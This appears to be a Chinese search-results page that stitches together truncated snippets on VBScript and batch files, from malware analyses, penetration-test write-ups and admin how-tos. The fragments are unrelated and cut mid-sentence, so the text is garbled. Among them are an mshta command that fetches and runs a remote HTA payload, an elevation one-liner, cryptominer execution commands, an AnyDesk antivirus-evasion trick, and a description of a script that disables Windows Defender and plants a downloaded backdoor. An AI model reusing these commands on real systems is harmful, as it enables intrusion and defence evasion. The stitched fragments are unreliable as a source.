在过去的几个月里,Gamaredon 使用了许多不同的编程语言,从 C# 到 VBScript、批处理文件和 C/C++。...在我们分析的样本中,注入的宏是简单的下载器。 批处理文件/VBScript 该模块的 VBScript 版本在行为上与 .NET 类似。...这些文件窃取程序还可以从 C&C 服务器下载和执行任意代码。与 Gamaredon 小组使用的许多其他工具一样,它们有四种不同的编码语言:C/C++、C#、批处理文件和 VBScript。...C# 后门线程创建例程 批处理文件/VBScript 此版本包含多个脚本,以批处理文件形式和 VBScript 编写。但是,最终目标是相同的:扫描系统以查找敏感文档。...解密后,这些脚本是经过混淆的 VBScript 下载器,能够下载和执行任意代码。 网络基础设施 Gamaredon 组为其 C&C 服务器使用许多不同的域,包括免费和付费。
使用winsw部署SpringBoot项目 简介 在linux下部署springboot项目是一件很简单的事,直接后台运行就行了,最多写个shell脚本开机自启就行了。...我们最近做的项目需要在windows上部署,在windows上运行jar有一个问题,运行的时候会弹出一个cmd窗口,并且不能关闭,关闭的话程序就停止了。...spring官方推荐使用winsw来将springboot项目作为服务运行,参考https://docs.spring.io/spring-boot/docs/1.5.9.RELEASE/reference...下载后将winsw执行程序和xml改成同样的名字,比如使用项目名+Service的命名方式。...将命令写在批处理文件中,希望将批处理文件默认为管理员权限打开,可以在批处理文件的开头写上: %1 mshta vbscript:CreateObject("Shell.Application").ShellExecute
VBScript 脚本引擎代码在vbscript.dll 中。 2.1. VBScript的变量 VBScript 的内存变量占用0×10个字节, 前两个字节定了变量类型VARTYPE。...这里介绍一个小技巧:先将断点用bd命令禁掉,在想断下的VBScript 脚本前加入MsgBox函数,当MsgBox弹出后,我们再把断点用be命令恢复。这样就可以确保断在我们想断的地方。...为清晰起见,我们将在脚本中将aw.Cod(0,0)设成0×11223344。 利用该技巧,我们在vbscript!...当执行 o = aw.Cod(arg1,2)时, VBScript引擎将会把地址0x2f72878作为一个vbString对象来处理。...Nebula EK 在VBScript脚本中会生成一个3K左右的文件。
OneNote 的广泛使用:OneNote 作为广泛使用的应用程序,并且能够嵌入不同类型的内容。...提取的恶意文件 批处理文件经过混淆,并且包含一个加密的数据块,随后是高度混淆的 PowerShell 代码。...混淆的批处理文件 研究人员解析文件,如下所示: 执行的命令 日志显示批处理文件复制并伪装恶意样本名为 zoo1.bat.exe,以试图隐藏其活动。...银行木马 从 2023 年 1 月开始,Qakbot 开始尝试使用 OneNote 作为恶意软件传播的载体。...CyberChef 解码后可以看出是 VBScript 脚本,会进一步下载并执行其他 Payload: 解码 Payload 第三个文件是经过多层混淆的二进制文件,分别是 URL 编码、base64
文章前言 2022年3月,我们观察到一个披露在互联网上的Microsoft SQL服务器遭到入侵,这次入侵的最终目标是部署一个挖矿程序,虽然在成功利用后在易受攻击的服务器上部署挖矿程序是攻击者的常见目标...将base64数据解码为一个可执行文件,这个可执行文件是一个权限提升工具,用于执行批处理文件,以确保它以足够高的权限执行,然后他们执行批处理脚本,这些命令包括向本地管理员组添加新用户、启用RDP、启用WDigest...编译,Mofcomp.exe也用于通过解析MOF语句来执行脚本,并创建新的类作为WMI存储库的一部分 cmd.exe /c mofcomp.exe C:\Windows\SERVIC~1\MSSQL$...在主机上执行的Visual Basic编码(VBE)文件,一旦运行该脚本将设置并执行XMRig CoinMiner,在执行过程中,密码579562847作为参数提供 cscript.exe /b /e...内容:VBScript 事件过滤器: 名称:EFNMdr(随机命名) 触发器:当地时间每天23:00 在VBScript中我们注意到它正在扩展到域mymst007.info在端口4000上再下载一个文件并保存为临时文件
当我们使用文本编辑器打开这个文件之后,我们发现了很多中文繁体字符(乱码): ?...0xFEFF的字节顺序标记(BOM)出现在文件的开始部分(标记Unicode文本流的开始),其中包含了隐藏的批处理文件代码。下面给出的是我们使用十六进制编辑器打开后所看到的内容: ?...通过使用PShellExec.exe,它首先会对下载下来的PowerShell脚本进行加密,然后删除原始脚本,并运行加密后的脚本; ? 4....最后,它会创建一个VBScript脚本,并执行加密后的PowerShell脚本。为了实现持久化感染,它还会在目标系统的启动目录STARTUP文件夹中创建一个符号链接; ?...分析PowerShell脚本 乍看之下,这个脚本貌似参考的是Matthew Graeber之前所开发的PowerShell脚本,即PowerSyringe,一个基于PowerShell的代码/DLL
“GPS监控服务器”需要打开的端口:89、3873、1098、1501、6969、6767、2099; “人员定位服务器”需要打开的端口:89、1504、7979、7878; http://www1.exlive.cn...ipconfig /all命令下发现这台主机有两个网卡,公网:47.**.***.77,内网:10.28.176.131,两个内网DNS服务器:10.143.22.116、10.143.22.118,并且可以与外网进行通讯...0x04 绕过主动防御上线 测试了以前常用的Powershell混淆法,不过已经被360主动防御拦了,微软defender也会检测ps1脚本内容。...为避免触发异地登录提醒,我们可以利用AnyDesk来进行绕过,将AnyDesk.exe和静默安装批处理文件上传至可读写目录中,然后在命令行下执行该批处理文件获取连接ID。...nul for /f "delims=" %%i in ('anydesk --get-id') do set CID=%%i echo Connection ID Is: %CID% 接着我们使用静默安装批处理文件中设置的固定连接密码和获取到的连接
如果选了,在批处理文件中的其他命令就会因为计算机重启动而无法执行。...可以使用命令行选项运行wise installation.exe,以自动执行常用任务 更多参数: /c file.wse 从WISE脚本创建可执行文件 /r 在 SetupCapture 窗口中打开WISE.../u 运行升级向导,检查是否有联机升级 /d compvar=value 在企业版中定义单个编译器变量。...多个定义需要多个 /d (/d=文件名-使用文件名来定义编译器变量。...以下是一个可以用于批处理文件安装 Inno 打包的软件的命令的示例: ECHO.
这里给大家介绍通过Bat脚本的方式,实现异常Windows服务的重启,这样再也不用担心服务器因为应用服务挂掉,还需要火急火燎的处理问题了。当然前提是你的应用服务应该配置为Windows服务的方式启动。...启动成功之后的效果 服务启动后,重新执行Bat脚本,效果如下图 三、封装为服务的方式运行 建议把Bat脚本打包为Windows服务器的方式运行,如果直接使用cmd窗口运行的话,有被关掉的风险,使用后台运行的方式更加可靠...官网:http://www.nssm.cc/usage 3.2 Windows服务程序 将批处理脚本作为Windows服务运行的方法是编写一个简单的Windows服务程序,然后在该服务程序中调用批处理文件...工具winsw 使用它可以将任何可执行文件包装成Windows服务。...使用命令行工具 sc 注册服务: 注意:这种方法还是间接地将批处理文件作为服务运行,而不是直接将批处理文件注册为服务。 我正在参与2024腾讯技术创作特训营第五期有奖征文,快来和我瓜分大奖!
sct certutil.exe winrm.vbs msiexec.exe wmic.exe pubprn.vbs 参考 加载脚本方式 利用Windows自带的解析器:PowerShell、VBScript...、批处理文件和JavaScript,对应的应用程序分别为powershell.exe、cscript.exe、cmd.exe和mshta.exe。...利用上传或远程加载对应payload脚本,直接调用解析器运行(可以使用Invoke-Obfuscation或者 Invoke-DOSfuscation 等进行混淆) 用Windows自带的工具或脚本等原生工具实现执行恶意代码...、启动程序、执行脚本、窃取数据、横向扩展、维持访问等,常用的有regsvr32.exe、rundll32.exe、certutil.exe、schtasks.exe、wmic.exe等,脚本类型的有:winrm.vbs...windows执行 mshta http://192.168.164.128:8080/lWdH9aFeeIe.hta CScript.exe&WScript.exe 上述两个工具都可以解析运行vbs和js的脚本
Defeat-Defender Defeat-Defender是一款功能强大的Batch批处理脚本,该脚本可以帮助广大研究人员在渗透测试的过程中,完全禁用Windows Defender、防火墙和Smartscreen.../Defeat-Defender.bat#L72 接下来,运行“run.vbs”脚本,此时脚本将会要求获取管理员权限。...如果授予脚本管理员权限的话,该脚本将会在后台静默运行,不会弹出任何命令行窗口。...但我们这里使用了NSudo来禁用实时保护功能,这样可以避免触发Windows Defender的警报。 运行Defeat-Defender脚本 运行机制 批处理文件执行之后,它将会要求获取管理员权限。...在拿到管理员权限之后,它将会开始禁用Windows Defender实时保护功能、Windows防火墙和SmartScreen,并从远程服务器下载我们的后门程序,然后将后门存储至系统的启动目录之中。
奇怪的是,可疑文档似乎是由一个名为Geocities的公共博客网站提供了一个多层嵌套的base64编码的VBScript脚本,下图是手工解码的结果: ? 图1....VBScript base 64解码代码 在多层循环解码base 64编码后,结果很明显的:附加于Word附件文档,隐藏在VBScript文件中,存在一个长且危险的脚本,随时可由Powershell执行...MalwareMustDie在博客中写道: 将shellcode数据保存在汇编文件的.text部分和入口点(EP)中将在编译过程中由编译器“调整”,这样你可以将此shellcode作为二进制PE文件执行...图8.对 Poison Ivy 恶意软件的C&C服务器WHOIS 结论 这个APT攻击使用了多种变体,它先是欺骗受害者下载一个恶意VBScript,让这个VBScript去下载一个.doc文件并打开它。...这种不感染文件的攻击有效地避免了多个编码和包装检测的已知签名,并且100%避免了原始攻击者的工作区域被发现的可能性。 这将使目前的APT活动有更好的机会成功由类似有效载荷造成的其他情况。
恶意程序的多种多样,如 JavaScript、Windows 批处理文件或 Visual Basic 脚本。...脚本执行后,会通过下载服务器下载下一阶段的攻击载荷,攻击者将下载服务器部署在基于 Azure 的 Windows 服务器或基于 AWS 的 EC2 实例上。...AsyncRAT 创建互斥体 AsyncMutex_6SI8OkPnk作为失陷主机的感染标记。...△ Batch Downloader 示例 VBS Downloader 脚本通过 PowerShell 命令连接到服务器,服务器部署在 AWS EC2 上的 52.27.15.250。...△ VBScript Downloader 示例 PowerShell Dropper 在 Azure 的服务器上发现了一个使用 HCrypt 构建的 PowerShell 脚本。
关于MSIDump MSIDump是一款功能强大的恶意MSI安装包安全分析工具,该工具还支持提取文件、数据流、二进制数据,并结合YARA扫描器来执行安全分析任务。...功能介绍 1、快速确定目标文件是否可疑; 2、可疑枚举所有MSI表并转储特定记录; 3、支持从CAB提取二进制数据和所有文件,以及从CustomActions提取脚本; 4、使用YARA规则扫描所有内部数据和记录... msidump.py evil.msi -y rules.yara 此时,我们将能够看到输入MSI被注入了可疑的VBScript,并且其中包含许多可执行文件。...接下来,我们可以通过只提取该记录来仔细分析这个VBScript。我们从分类表中看到,它出现在Binary表中。...文件或目录 Options: -q, --quiet 开启静默模式 -v, --verbose 开启Verbose模式 -d, --debug
操作步骤 前提条件,当然是需要打开被远程的 Win10 系统的远程桌面的访问功能......进阶用法 上述命令只能临时使用,如果需要系统后台使用并开机自启脚本运行,创建批处理文件start_ssh_tunnel.bat键入如下脚本: @ECHO OFF ssh -R *:3389:127.0.0.1...:3389 root@jokeysoft.com PAUSE 创建 start_ssh_tunnel.vbs 脚本使用静默模式启动(后台运行),如下代码所示: Set WshShell = CreateObject...ssh 实现的内网穿透来远程局域网的主机了。...捕获-1-300x245.png 总结 这里抛砖引玉实现了在外网访问局域网内 Win 10 远程桌面服务的反向代理, 实际上 ssh 代理通道可以实现很多类似场景的通信需求,大家按照实际需求开动脑筋使用即可
常见的脚本语言包括JavaScript和VBScript JavaScript JavaScript是面向对象编程,与强类型的java语言不同,他是弱类型的。...JavaScript编写的攻击脚本,也是可以跨浏览器运行的 VBScript VBScript只有微软浏览器才支持,而且在真正的Web开发中几乎没人使用,这是因为不是所有的浏览器都支持他,所以被淘汰啦...现在随着浏览器大量的抽象功能的增加,浏览器的攻击面越来越大。 现代浏览器的更新一般都是采用后台自动和静默方式。有时候,攻击面的变化是防御者意识不到的。 1....静默更新 所谓静默更新,就是指浏览器会自动后台更新,用户无权禁止这个功能,且更新的时候不会被用户阻断,这就可以保证及时提供所有更新。 他的优点在于可以更快速的更新应用。...攻击的形式有很多,图中有七种方式可以对浏览器核心发起攻击,但到底应该采取那种方法,要根据许多因素来决定。 1. 绕过同源策略 可以把同源策略看作为浏览器的一个沙箱。
如何在 Windows 10上创建批处理文件 创建批处理(脚本或批处理脚本)文件的过程很简单。你只需要一个文本编辑器和一些基本的命令行知识。...在下面的说明中,我们将讲述编写基本批处理文件的步骤、编写脚本以更改 Windows 10 上的系统设置的步骤。...文件资源管理器 使用文件资源管理器运行批处理文件步骤: 打开文件浏览器 浏览到带有脚本的文件夹 双击批处理文件以运行它 (可选)如果要执行一个需要管理员特权的命令,需要以管理员身份运行脚本,方法是右键单击批处理文件并选择...使用天或上下拉菜单来确认任务将运行的天。 点击下一步按钮 选择 启动程序 选项以运行批处理文件。 在程序或脚本字段中,单击 浏览 按钮 选择您创建的批处理文件,点击下一步按钮。...要在 Windows 10上启动脚本,请使用以下简单步骤: 打开文件浏览器 浏览到带有批处理文件的文件夹 右键单击批处理文件并选择 复制 选项 使用 Windows 键 + r 快捷键打开 Run 命令
诱饵图片引诱 Facebook 账号的管理员下载恶意软件,与此前不同的是,该攻击行动中使用了批处理文件而不是可执行文件作为初始 Payload。...研究人员发现了相同的、多种语言的批处理文件,说明攻击者对不同的受害群体进行了定制化。 下载脚本文件后,用户可能会点击运行批处理文件。...由于批处理文件使用的字符编码不同,默认情况下使用文本编辑器打开会显示不连贯的字符。这也是攻击者进行混淆的一种方式,使用正确的编码打开即可对脚本进行分析。...恶意脚本会收集 Chrome 浏览器多方面的数据,例如登录数据、Cookie 与本地状态等。所有复制的文件都会被放置在临时文件夹中,以用户的 IP 地址与国家/地区代码作为文件夹名称。...一旦数据被泄露,该脚本就会对创建的所有文件与文件夹进行清理。由于恶意批处理文件被放置在启动文件夹中,用户凭据与其他浏览器数据将会不断被收集回传。
它是用来指定筛选器的。筛选器,顾名思义就是选择符合指定条件的进程来杀掉。所以关键在后面的筛选条件。 筛选条件不言自明,就是名称为 dosvc 的服务进程,和名称为wuauserv的服务进程。...我们执行这种后台程序,最好的模式就是管理员身份运行,并且不弹出黑窗口,所以runas要打开,show要赋值0。 把这两行放到我们批处理文件的头部,就可以做出一个完整的脚本了。...我们来整合一下完整的bat文件: cd /d %~dp0 %1 start "" mshta vbscript:createobject("shell.application").shellexecute...注意一定要检查国产安全软件中开机启动项的设置,把刚才制作的脚本放行。不然,开机不自启那叫什么东西啊。...同时,我们也看到微软作为垄断企业的巨大权力,它可以随意控制用户的计算机。所以,发展国产操作系统也是势在必行。如果中国有足够多的优秀Linux开发者,打破微软的垄断地位也就不是不可行了。
JZGKCHINA 工控技术分享平台 微软宣布弃用 VBScript并计划在未来的 Windows 版本中逐步淘汰该脚本语言。“VBScript 在从操作系统中移除之前,将作为按需功能提供。”...VBScript可以看作是 VB 语言的简化版,它具有VB语言容易学习的特性。...这种语言广泛应用于网页和 ASP 程序制作,同时还可以直接作为广大HMI组态软件的脚本引擎使用,例如西门子的WINCC,霍尼韦尔HMI builder,国内杰控组态软件等等,主要是直接调用VBS应用非常方便...VBS天生集成到 Windows 环境中,并通过VBS脚本与主机应用和组件程序通信。 尽管微软官方并未对此做出任何解释。 笔者猜测 弃用 VBScript 的的部分原因可能是出于安全考虑。...,比如IFIX的VBA脚本,FacrotyTalk ViewSE的VBA脚本,Citect悉亚特的VBA脚本等等吧。。。。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
对象存储
腾讯会议
云直播
